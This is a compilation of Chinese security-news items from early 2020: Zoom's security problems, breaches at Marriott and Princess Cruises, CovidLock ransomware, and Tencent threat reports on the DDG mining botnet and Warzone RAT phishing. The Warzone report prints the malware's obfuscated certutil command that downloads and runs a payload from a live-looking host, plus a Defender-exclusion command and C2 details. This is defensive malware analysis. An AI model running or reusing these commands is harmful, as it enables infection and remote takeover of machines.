标签: 网络安全

Zoom 就隐私和安全问题道歉 并将冻结新功能以专注于修复各种问题

由于在冠状病毒大流行期间使用量增加,外界开始关注视频会议软件Zoom众多安全和隐私问题。现在,Zoom公司首席执行官Eric S Yuan向用户发表了冗长的声明,对不可预见的问题表示歉意,并承诺会进行改善。 ric S Yuan表示:“这些新的用例帮助我们发现了平台上无法预料的问题。记者和安全研究人员还帮助识别了先前存在的问题。我们感谢这些详细检查和疑问,其中包括有关服务的工作方式,我们的基础架构和容量,以及我们的隐私和安全政策。这些问题将使Zoom本身变得更加完善,为用户提供更好的服务。我们非常认真地对待这些详细检查和疑问,我们正在仔细研究每一个问题,并尽快解决它们。” Zoom已经采取了措施来回应对此提出的批评。该公司已更新了隐私政策,从其iOS应用中删除了Facebook SDK,试图解决Zoombombing问题,修复了UNC链接的安全性问题,并阐明了其在端到端加密中的地位。 Eric S Yuan解释了Zoom在接下来的几个月中还会做什么。在接下来的90天内,Zoom致力于提供必要的资源,以更好地主动识别,解决和解决问题。Zoom还致力于在整个过程中保持透明,Zoom将尽一切努力保持您的信任,其中包括:立即冻结添加新功能,并立即转移所有工程资源以专注于最大的信任,安全和隐私问题。与第三方专家和代表用户进行全面审查,以了解并确保Zoom所有新消费者使用案例的安全性。准备透明度报告,其中详细说明了与数据,记录或内容请求有关的信息。增强当前的漏洞赏金计划。进行一系列白盒渗透测试,以进一步发现和解决问题。 Eric S Yuan表示,从下周开始,将在太平洋标准时间每周三上午10点举办每周一次的网络研讨会,向社区提供隐私和安全更新。   (稿源:cnBeta,封面源自网络。)

DDG 僵尸网络一月升级 9 个版本攻击 Linux 系统挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/8pJCK6vyxbXJK08VgBZ6Ng 一、概述 DDG僵尸网络最早出现于2017年, 主要是通过对SSH 服务和 Redis 服务进行扫描暴破入侵LINUX系统挖门罗币获利,腾讯安全威胁情报中心曾多次披露该团伙的挖矿活动。近日,腾讯安全发现DDG僵尸网络频繁更新,在最近最近一个月内总共更新了9个版本,平均每周更新2个版本(DDG/5015-DDG/5023)。 DDG挖矿木马执行后会请求下发配置文件,根据配置文件下载挖矿木马wordpress及病毒脚本i.sh执行,此外最新版的DDG挖矿木马一大变化是会下载脚本uninstall.sh,quartz_uninstall.sh卸载腾讯云云镜,阿里云安骑士等安全防护产品以增强挖矿木马在服务器的存活时间。 病毒的挖矿行为会对服务器性能产生极大影响,腾讯安全专家建议Linux管理员注意避免使用弱密码,及时修补系统漏洞,在企业内网部署腾讯T-Sec高级威胁检测系统及时发现黑客控制服务器挖矿的事件发生。 二、详细分析 1.DDG挖矿木马一月更新九个版本 DDG挖矿木马更新频繁,最近一次更新是在3月31日,目前已更新到DDG/5023版本。从服务器文件变更时间看,最近一个月内(2月27-3月31),总共更新了9个版本,平均每周更新2个版本(DDG/5015-DDG/5023) DDG挖矿木马最新的服务器下载地址为:hxxp://67.205.168.20:8000/static/xxxx/ddgs.$(uname -m),其中xxxx为版本号,通过系统命令$(uname -m)获取到具体的系统版本来下载对应的版本。 2.下发配置文件 DDG木马通过向服务器hxxp:[ip]:[port]/slave发送 HTTP POST 请求来获取配置数据,最新的返回的配置数据包括挖矿木马wordpress的md5, ddg最新的更新地址,病毒脚本i.sh下载地址等信息。 3.病毒脚本i.sh 下载i.sh执行,下载地址:hxxp://67.205.168.20:8000/i.sh。主要功能有: (1) 创建定时任务,每15分钟执行一次,定时任务主要内容是下载执行  i.sh (2) 下载更新最新版的DDG病毒,目前已更新到DDG/5023版本 (3) 结束旧版本的木马进程。 4.卸载服务器安防产品 最新版的DDG木马一大变化是会下载脚本uninstall.sh,quartz_uninstall.sh,以卸载腾讯云云镜,阿里云安骑士等安全防护产品以实现在服务器的长时间驻留。 5.改写hosts文件,屏蔽竞争木马的网址 修改hosts文件,将trumpzwlvlyrvlss.onion等竞争木马的网址映射到ip地址0.0.0.0,以实现屏蔽竞争对手木马独占系统资源的目的。修改后的hosts文件如下 6.挖矿木马wordpress 下载门罗币挖矿木马wordpress,该木马由开源挖矿程序XMRig编译,挖矿木马执行后可以发现占用了极大的系统资源。 挖矿时使用矿池: 178.128.108.158:443 103.195.4.139:443 68.183.182.120:443 三、安全建议 腾讯安全专家建议企业采取以下措施防止挖矿木马控制服务器: 1.为Redis添加强密码验证,切勿使用弱口令; 2.定期对服务器进行加固,尽早修复企业服务器相关组件的安全漏洞,并及时进行漏洞修复; 3.推荐企业在终端或服务器上部署腾讯T-Sec终端安全管理系统拦截恶意软件,亦可考虑将Web服务器部署在腾讯云等具备专业安全防护能力的云服务上; 4.推荐企业用户使用腾讯T-Sec高级威胁检测系统(御界)检测黑客攻击和挖矿行为。腾讯T-Sec高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs MD5 DDG(5015-5023) e64b247d4cd9f8c58aedc708c822e84b 2c4b9d01d2f244bb6530b48df99d04ae d2a81a0284cdf5280103bee06d5fe928 495dfc4ba85fac2a93e7b3f19d12ea7d 682f839c1097af5fae75e0c5c39fa054 dc87e9c91503cc8f2e8e3249cd0b52d7 c8b416b148d461334ae52aa75c5bfa79 f84a0180ebf1596df4e8e8b8cfcedf63 14fcb1d3a0f6ecea9e18eff2016bc271 挖矿木马: d146612bed765ba32200e0f97d0330c8 i.sh: bceb6cbb2657e9a04b6527161ba931d8 IP: 67.205.168.20 47.94.153.241 61.129.51.79 47.101.35.209 矿池: 178.128.108.158:443 103.195.4.139:443 68.183.182.120:443

万豪披露又一起数据安全事件 520 万客户信息泄露

本周二,万豪(Marriott)披露了旗下连锁酒店的又一起客户数据泄露事件。报道称事件发生于今年 1 月中旬,但直到 2 月下旬才被发现。调查发现有两名员工的登陆凭据有关,事件导致 520 万客户信息泄露。在堵上安全漏洞之后,万豪声称入侵者已被禁止访问。 在周二的公告中,万豪表示其发现了使用上述两个被盗的员工登陆凭据的“意外数量的来宾信息访问”。在封堵漏洞和禁用相关登陆凭据的同时,该公司声称还将增强监测能力。 确切的泄露细节,可能因不同的客户而异。万豪表示本次漏洞敞开了包括客户性别、生日、单位、会员账户积分、电话、邮件、邮寄地址、以及姓名等内容。 庆幸的是,目前尚无证据表明某些重要客户的信息被泄露,包括驾照号码、银行卡信息、PIN 码或护照信息。不过随着时间的推移,后续可能有某些敏感信息被黑客曝光。 从 3 月 31 日起,万豪将通过电子邮件的方式,向可能受到本次安全漏洞影响的客户发去通知。同时,酒店将为受影响的客户提供个人信息监控服务。 需要指出的是,这并不是万豪连锁酒店首次曝出大规模的安全漏洞。比如 2019 年初的时候,其系统泄露了多达 500 万客户的未加密护照号码。 事件被发现与喜达屋的预订系统有关,影响自 2018 年 9 月 11 日前入住多达 3.83 亿的客户信息。 不过除了万豪,希尔顿酒店也在 2015 年遭遇了两次不同的客户数据泄露事件,导致其被处以 70 万美元的罚款。   (稿源:cnBeta,封面源自网络。)

冠状病毒爆发期间 研究人员在 Zoom 当中发现更多安全问题

在冠状病毒爆发期间,视频会议应用程序和服务使用率增加,导致安全人员在Zoom当中发现更多安全问题。据报道,视频会议服务Zoom可以通过解决苹果常规安全措施而在Mac上安装,并且还宣传其具有端到端加密功能,但显然没有。 之前它已将用户数据发送到Facebook(据称已修复),现在它还被指控存在两个单独的安全问题。Twitter用户@ c1truz_(恶意软件跟踪器VMRay的技术负责人)报告说,Zoom的Mac应用安装程序使用了预安装脚本,并据称显示了伪造的macOS系统消息。 c1truz称,在Mac上安装该应用程序时,无需用户给出最终同意,并且高度误导性的提示用于获得root特权。AppleInsider已就指控指控与Zoom取得联系,但尚未收到评论。苹果也没有公开发表评论。不过,之前苹果为纠正Zoom安全问题而强制对用户进行Mac OS更新。 另外,The Intercept声称Zoom并不是真正的端到端加密,在整个视频聊天中,用户和Zoom服务器之间的连接被加密,但是并不能阻止Zoom本身看到呼叫过程。Intercept说:“实际上,Zoom使用了其自己的术语定义,这使Zoom本身可以访问会议中未加密的视频和音频。”Zoom发言人向The Intercept证实了这一点,并表示当前无法为Zoom视频会议启用E2E加密。   (稿源:cnBeta,封面源自网络。)

暗网托管商 Daniel’s Hosting 再次被黑 7600 个网站全部下线

最大的暗网托管商 Daniel’s Hosting 再次被黑,数据库被删除,托管的7600个网站全部下线。它上一次被黑发生在 2018 年 11 月,这一次发生在 3 月 10 日,站长 Daniel Winzen 在一份声明中称,攻击者访问了服务的后端,删除了所有托管相关的数据库。 攻击者随后还删除了 Winzen 的数据库账号,创建了一个新的账号。Winzen 是在第二天发现入侵的,但为时已晚。他的服务设计没有备份——如果有备份的话托管商可能会收到法庭的传票,如果其托管的某个网站遭到调查的话——意味着数据无法恢复。 Winzen 表示他不知道黑客是如何入侵的,表示现在忙其它项目,没时间调查。   (稿源:solidot,封面源自网络。)

警惕假冒美国 CDC 发送新冠疫情的邮件投递商业木马 Warzone RAT

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心(CDC)作为发件人,投递附带Office公式编辑器漏洞的文档至目标邮箱,收件人在存在Office公式编辑器漏洞(CVE-2017-11882)的电脑上打开文档,就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件,具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能,并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据,该病毒从3月23日开始传播,目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件,建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击,客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知,将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc,引导收件人打开查看。 此时如果用户在没有安全防护软件,且使用没有修复CVE-2017-11882漏洞的Office打开此文档,就会触发漏洞中的恶意代码,然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为: CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写,代码经过高度混淆,运行时经过两次解密在内存中Invoke执行最终的PE文件,该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现,目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能: 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级(包括最新的Win10系统) 远程开启摄像头 盗取浏览器密码(Chrome,Firefox,IE,Edge,Outlook,Thunderbird,Foxmail) 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行,则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中: powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本,使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能,该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址:phantom101.duckdns.org:5200,与该地址建立连接成为受控机,使电脑完全被黑客控制。 与服务器进行TCP通信,传输数据使用RC4加密算法加密,密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下: C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 2、安装CVE-2017-11882漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器: reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管,可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统(御点)拦截病毒木马攻击,更多信息参考链接:https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

未来 Firefox 或将强制启用 HTTPS 链接 禁止访问不安全页面

Firefox的未来版本可能会引入HTTPS-only模式,也就是说全面阻止访问不安全的网站。在最新上线的Firefox 76 Nightly版本中,Mozilla引入了一项实验性功能,如果一切顺利将会在未来几个月登陆稳定版中,向所有用户开放。 包括Mozilla在内的浏览器厂商在很早之前就已经开始推动HTTPS了,尽管目前大多数网站都已经升级启用了该安全协议,不过依然有一些站点还是使用HTTP。而在启用HTTPS-only模式之后,Firefox浏览器就不会再加载HTTP网站。 浏览器首先会尝试访问服务器以获取HTTPS链接,如果该版本不存在,则会向用户提供一条错误消息,内容为“安全连接失败”。启用方式是安装最新的Firefox Nightly版本,在about:config页面中启用dom.security.https_only_mode这个Flag。在启用之后将强制不再加载HTTP页面。   (稿源:cnBeta,封面源自网络。)

安全专家表示随着冠状病毒危机恶化黑客攻击正在增加

当用户尝试避免感染真正的病毒时,黑客正在尝试使用恶意软件感染用户设备或获取用户个人信息。安全专家说,一般而言,黑客攻击的企图越来越频繁,而发展最快的策略之一就是利用冠状病毒危机作为诡计。 安全公司Zscaler表示,自今年年初以来,针对其监控系统的黑客威胁每月增加15%,而到今年3月为止,这一数字已跃升20%。越来越多的黑客通过承诺提供信息或保护来引诱受害者免受COVID-19病毒的侵害。COVID-19是一种新型冠状病毒引起的疾病,现已演变成全球大流行,全球有214000多起病例,8700人死亡。 Zscaler表示:攻击的两个主要类别使用“冠状病毒”或“ COVID-19”一词来吸引大量目标。 3月份,该公司发现了近2万起网络钓鱼攻击事件,这些攻击将用户引导到欺诈性网站,并试图诱骗用户输入敏感信息,例如密码或信用卡号。它还发现了7000多个事件,诱骗受害者下载恶意软件,所有这些事件都提到了这次健康危机。 美国国家网络安全联盟(National Cyber Security Alliance)敦促互联网用户在访问网站或下载与COVID-19相关的应用时要谨慎。用户应该始终警惕要求用户提供个人信息的不请自来的电子邮件。   (稿源:cnBeta,封面源自网络。)

疫情追踪应用暗藏 Covid Lock 勒索软件 下载安装请留心

随着新冠病毒引发的 COVID-19 疫情在全球的爆发,各种鱼龙混杂的“疫情追踪器”也开始盯上粗心的移动设备用户。一旦被名为 CovidLock 的勒索软件给劫持,用户将不得不支付 100 美元的赎金,以解锁他们的 Android 智能机。 据悉,这款勒索软件会锁定受害者的手机屏幕并更改设备密码。如果此前未设定密码,CovidLock 还会自动设置一个密码,以迫使用户就范。 DomainTools 分析称,受害者必须支付相当于 100 美元的 BTC 赎金才能解锁他们的智能手机,否则将窃取照片、联系人之类的敏感信息,甚至在网络上泄露一部分细节。 截图文字显示 —— 你的手机已被加密,请在 48 小时内支付 100 美元的 BTC,否则包括联系人、照片、视频等在内的所有内容将被删除,所有社交媒体账户会被公开、且本机存储将被完全抹除。 此外攻击者警告称 —— 你的 GPS 已被监视,我们已知晓你的位置。如尝试进行任何愚蠢的操作,手机将触发自毁。 好消息是,通过逆向工程,DomainTools 已经搞定了这款勒索软件的解锁密钥,此外研究团队正密切关注攻击者的 BTC 钱包,更多细节将很快公布。 对于普通用户来说,谨记远离任何不信任的应用来源,并仔细检查手机已安装的每款 App 的权限设置。   (稿源:cnBeta,封面源自网络。)

一波未平一波又起:公主邮轮承认公司存在数据泄露问题

据外媒报道,在两艘邮轮爆发了新冠病毒后被迫在全球范围内停止运营的Princess Cruises(公主邮轮)目前已证实存在数据泄露问题。据信,这份发布在其网站上的通知实际上是在3月初发布的。该份通知称,公司在2019年4月至7月的4个月时间内发现了大量未经授权的电子邮件账号登入,其中一些包含了职工、邮轮工作人员和客人的个人信息。 Princess Cruises指出,姓名、地址、社会安全号码和政府证件如护照号码和驾驶执照号码以及财务和健康信息都可能被窃取。但这家公司表示,潜在的影响数据并不是针对每位客人。 另外这家公司表示,他们是在2019年5月发现了这一网络可疑活动。目前并不清楚为何该它花费了近一年时间才披露这一漏洞。对此,该公司发言人没有立即回应置评请求。 拥有Princess品牌的嘉年华邮轮公司(Carnival)本周股价下跌了逾30%,此前这家公司宣布将暂停旗下18艘邮轮的营运。该公司在日本和最近的美加州分别发生了两起涉及载有数十名新冠病毒感染者的事件。 此外,Princess Cruises也没有说明是在哪个司法管辖区报告了这一数据泄露事件。如果是在欧洲,则会因违反欧洲数据保护规定而会被处以高达其年营业额4%的罚款处罚。   (稿源:cnBeta,封面源自网络。)